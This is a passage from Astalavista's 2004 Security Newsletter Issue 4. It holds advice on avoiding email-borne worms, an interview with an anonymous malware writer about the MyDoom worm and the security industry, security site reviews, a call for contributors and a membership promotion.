discussed the various ways in which you can get infected by either a trojan or a worm.
- How can I protect myself? -
- The logical approach
Question yourself, how come am I receiving an e-mail from someone I don't know, that contains nothing but
bulk characters, and an attachment with a strange extension? How come am I receiving an e-mail from John, my colleague
in Chicago's branch, that doesn't even include his signature, or at least a personal message, but just an attachment?
I'd better mail/call him, lose several minutes, but verify what is going on, if it's a malware, he could immediatelly
contact their Information Security Office for futher actions. Don't be naive, you won't get rich by forwarding an e-mail,
you won't fall in love because of forwarding an e-mail, but you might get youself and a countless number of other
people in trouble.
Don't fall a victim because of your naivety!
08. Meet the Security Scene
-----------------------
In this section you are going to meet famous people, security experts and
all the folks who in some way contribute to the growth of the community.
We hope that you will enjoy these interviews and that you will learn a lot of
interesting information through this section. In this issue we have interviewed
an anonymous malwares' coder that requested this interview due to the appearance of the MyDoom Worm.
He insisted in giving us this interview, due to his long-term expertise in this field; we,
of course, doublechecked how experienced he is, and were pretty surprised when we found out
more info on his worms etc. In a time of worms' spreading around the Internet on a daily basis,
we believe you're going to enjoy this interview. Something else to consider before mailing us
about it is that we don't have his e-mail, or any of his contacts due to obvious
reasons. The interview was conducted following the coder's personal views of anonymity.
Your comments are appreciated at security@astalavista.net
------------------------------------------------
Interview with an Anonymous Malwares' Coder
Astalavista: Before we start, I think it would be better if you pick up a random name, so I can at least call you in some
way :)
Malwares' Coder: Doesn't bother me, how does Joe sound?
Astalavista: Ok, Joe, what was your primary intention when you e-mailed us, requesting this interview?
Joe: Before answering this question, I would like to clarify something - I'm speaking for myself, I don't represent the
virii/malware scene in any way, all views and answers are based on my viewpoint. On your question...the MyDoom Worm
epidemic made me request this talk, and particularly the articles published around the major news portals. I especially
don't like the audience there, because it's the audience that makes the portal. Do you actually believe you're going to
see "the real story" at a site like these? I wanted to give more publicity of the malware scene, I wanted to talk about
how easy it is to launch a trojan and about all these 250k's we keep seeing as rewards on the next worm. Something else,
I wanted to get the publicity of this interview through Astalavista.com as a well-known and one of the most popular sites
for security in the world, as by what I know, it's just a myth that the site is visited by novice and warez visitors only.
I, personally believe that the site is visited by the major ITSecurity companies in the industry, also government visitors
from all over the world. Astalavista.com just gives an overview of the "underground" in all of its
forms, enough flettering:-)
Astalavista: Our visitors would really appreciate if you give us more info about your background and experience in
this field?
Joe: Sure. I've been involved in the virii scene for the past 10 years. By involved, I mean participating in active
virii coding groups, attenting private cons and local meetings, writing articles on how to code. I'm currently employed
by a well known anti-virus vendor - they're aware of my background, so I'm just analyzing malware.
During all the time I've been talking about ethics as well.
Astalavista: How come are you a virii writer then? :)
Joe: Honestly, how easy is it to code a virus nowadays? How easy is it to modify a public source code and then turn it
into another mutation of the actual virus, and besides all, who do you think is going to do it? Those who don't
even have a basic understanding of life and what's left when they play with "toys" like these, with the Internet helping
them. I have always tried to restrict lamers from knowledge that is too powerfull to be mastered by a bunch of potheads.
I have always been "poisoning" source code in order to stop this invasion, because I'm so sick of seeing
*.aol.com's IPs requesting sources and binary's.
Astalavista: Were you surprised by the MyDoom Worm's appearance?
Joe: No, but I was surprised on the worm's early version that the author "released", then waited for a while
and released the rest.
Astalavista: You mean, that he's "playing with the victim", because it's absolutely sure that the worm will do
its dirty work sooner or later?
Joe: Exactly! It could have had a much greater impact, even SCO's partners could have been damaged, so I consider
this as a warning done in the lamest, yet most powerful and easy to execute way, by a worm.
Astalavista: Do you believe the attacks on SCO's web site by the MyDoom Worm are part of the "Linux War" mentioned
in a recent article at http://internetnews.com/?
Joe: Everything starts with finding an enemy. Having an enemy means he's powerfull enough to get you in trouble,
so if it's a part of the "Linux War", then Linux is finnally getting the attention it deserves. TO me, the decoded
"Nothing personal,the "I'm just doing my job" message sounds like someone's been hired to do something, but while doing it,
he/she realises the impact it is going to have, so a personall message is left in the code.
Astalavista: Guilty conscious perhaps, but if is so, then I'm sure the "employee" will take a certain % out
of his payment, just because of the clue he/she's giving, and how about if someone is orchestrating all this for
personal reasons?
Joe: I doubt it's the fired Joe from the financial department; hiring someone else to do this, he would get caught
for sure. Or Microsoft's advanced coding fans DDoSing http://kernel.org/ :-) But everything is possible, it might be
someone who doesn't have anything better to do, might be someone who's just trying to open more work for the news
agencies, or the devastating type of coder.
Astalavista: Let's put it simple, why do malware coders code?
Joe: I think you know the answer better than me - coding is power, seeing how your "baby" makes its first steps
is also powerfull. Everyone has a reason to do something, or at least they believe they have a reason. For me, the most
important point is how many people actually believe they're not going to get caught and keep thinking of ways to avoid
that while coding their programs.
Astalavista: And how about all of these 250k's rewards, are they going to do any good in the tracing of the author?
I still hang out with the people I used to code my first worms with, we have real jobs, like freelance consultants
or whatever, that's not the point, it's something else that connects us, it's the intimacy of all these moments when
we coded our first "babies", and I doubt they will sell these moments even for 500k, I know what I'm saying,
people change, but their history and background never do, with some exceptions, of course.
I will tell you something - to me it's just a PR that "we" take security seriously enough to offer such a large amount
of money in reward for someone who did damage our business. But how come they offer 250k, instead of proactively using
these 250k to invest in a disaster recovery plan for a situation like this, and even someone gets caughed because of
the 250k reward? who's lame, the caught coder or that company that gives away large amouts of money,
because it can't use them to properly react in such situations, and no, not by increasing their bandwith?
Astalavista: What is the best protection against worms?
Joe: If I tell you, I will lose my job :-) Let's put it that way, who opens the e-mail attachments received?
Astalavista: Who do you think made a small fortune out of the MyDoom problem?
Joe: I think it isn't that small, but I am not talking about the financial situation at the moment :-) - the anti-virus
vendors of course. In the first days of the mydoom worm, even google did extra "googling" especially for the MyDoom worm.
I'm sure they made quite a lot of money with the instant sponsored links placed by the major anti-virus vendors,
pointing to their commercial web sites, offering "unique" and free tools to remove the trojan.
Astalavista: Finally, tell us your opinion on the current situation of the ITSecurity industry?
Joe: It's obvious the industry is doing its best to deal with the major security issues today's networks and
computers face, but it cannot seem to be able to properly react to the malware's one, more and more "coders"
are taking advantage of that. Destruction is, as always, the easiest part.
Astalavista: Thanks for the interview, Joe. We appreciate your opinion!
Joe: Thanks for having me.
09. Security Sites Review
---------------------
The idea of this section is to provide you with reviews of various, highly interesting
and useful security related web sites. Before we recommend a site, we make sure that it provides
its visitors with quality and a unique content.
http://www.ccmostwanted.com/
The Most Wanted Cyber Criminals, I'm sure you're all going to enjoy this one, useful articles and daily news updates
can be found as well
http://security-forums.com/
Very friendly and highly popular security forums, everything related to Security is discussed
http://www.rootprompt.org/
Security news and papers about linux security And the Open Source community
10. Astalavista needs YOU!
---------------------
We are looking for authors that would be interested in writing security related
articles for our newsletter, for people's ideas that we will turn into reality with their help and for anyone who
thinks he/she could contribute to Astalavista in any way. Below we have summarized various issues that might
concern you.
- Write for Astalavista -
What topics can I write about?
You are encouraged to write on anything related to Security:
General Security
Security Basics
Windows Security
Linux Security
IDS (Intrusion Detection Systems)
Malicious Code
Enterprise Security
Penetration Testing
Wireless Security
Secure programming
What do I get?
Astalavista.com gets more than 200 000 unique visits every day, our Newsletter has more than
22,000 subscribers, so you can imagine what the exposure of your article and you will be, impressive, isn't it!
We will make your work and you popular among the community!
What are the rules?
Your article has to be UNIQUE and written especially for Astalavista, we are not interested in
republishing articles that have already been distributed somewhere else.
Where can I see a sample of a contributed article?
http://www.astalavista.com/media/files/malware.txt
Where and how should I send my article?
Direct your articles to dancho@astalavista.net and include a link to your article; once we take a look
at it and decide whether is it qualified enough to be published, we will contact you within several days,
please be patient.
Thanks a lot all of you, our future contributors!
11. Special Promotions
------------------
- Advanced Security Member Portal - Astalavista.net
--> Until the end of February <--
- 20$ off the real price($99) so you get a LIFETIME Membership for $79
Astalavista.net is a world-known and highly respected Security Portal offering
an enormous database of very well sorted and categorized Information Security
resources, files, tools, white papers, e-books etc. At your disposal
there are also thousands of working proxies, wargames servers, where all the members
try their skills and most importantly - the daily updates of the portal.
- Over 12,000 members have already subscribed
- Over 3.5 GByte of Security Related data, daily updates and always working
links.
- Access to thousands of anonymous proxies from all over the world, daily updates
- Security Forums Community where thousands of individuals are ready to share
their knowledge and answer your questions; replies are always received no matter
of the question asked.
- Several WarGames servers waiting to be hacked, information between those
interested in this activity is shared through the forums or via personal
messages, a growing archive of white papers containing info on previous
hacks of these servers is available as well.
http://www.astalavista.net/
The Advanced Security Member Portal
12. Final Words
-----------
We hope you've enjoyed Issue 4 of Astalavista's Security Newsletter. Year 2004 started with MyDoom worm, let's
hope it's not going to end with the Superworm. The topic of this issue was obviously malware, we decided
that the Newsletter, as highly popular and read by both home and enterprise users, will provide the two
audiences with useful information on how to protect their home and enterprise systems.
Don't be naive on anything you receive in your mailbox!
Editor - Dancho Danchev
dancho@astalavista.net
Proofreader - Yordanka Ilieva
danny@astalavista.net
